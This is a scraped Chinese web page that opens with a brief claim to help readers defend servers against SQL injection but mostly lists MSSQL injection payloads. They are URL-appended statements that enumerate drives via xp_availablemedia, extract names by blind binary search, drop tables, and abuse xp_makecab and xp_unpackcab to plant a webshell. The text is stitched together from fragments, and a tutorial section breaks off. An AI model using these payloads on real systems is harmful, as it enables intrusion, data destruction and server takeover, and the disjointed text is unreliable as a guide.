观察近来的一些安全事件及其后果,安全专家们已经得到一个结论,这些威胁主要是通过SQL注入造成的。虽然前面有许多文章讨论了SQL注入,但今天所讨论的内容也许可帮助你检查自己的服务器,并采取相应防范措施。
Continue reading SQL注入攻击的种类和防范方法
|
|||||
|
———以下以省略注入点用URL代替 URL;insert p exec xp_availablemedia;–列出所有驱动器并插入表p URL;and (select count(*) from p)>3;–折半法查出驱动器总数 URL;and ascii(substring((select a from p where i=1),1,1))=67;–折半法查出驱动器名(注asc(c)=67) –上面一般用于无显错情况下使用——-以此类推,得到所有驱动器名 URL;and (select a from p where i=1)>3;–报错得到第一个驱动器名 –上面一般用于显错情况下使用——-以此类推,得到所有驱动器名 URL;;drop table p;–删除表p 跨站式脚本注入的好用方法,总共分三节: 第一节、SQL注入的一般步骤 首先,判断环境,寻找注入点,判断数据库类型,这在入门篇已经讲过了。 其次,根据注入参数类型,在脑海中重构SQL语句的原貌,按参数类型主要分为下面三种: (A) ID=49 这类注入的参数是数字型,SQL语句原貌大致如下: Select * from 表名 where 字段=49 注入的参数为ID=49 And [查询条件],即是生成语句: Select * from 表名 where 字段=49 And [查询条件] 3个MSSQL扩展 EXEC [master].[dbo].[xp_makecab] ‘c:\test.rar’,'default’,1,’d:\cmd.asp’ 打包 EXEC [master].[dbo].[xp_unpackcab] ‘C:\test.rar’,'c:’,1, ‘n.asp’ 解包,可以用于得到webshell EXEC [master].[dbo].[xp_readerrorlog] 1,’d:\cmd.asp’ 读文本代码 |
|||||
|
Copyright © 2010 魔兽爱好者联盟 - All Rights Reserved
|
|||||
最新评论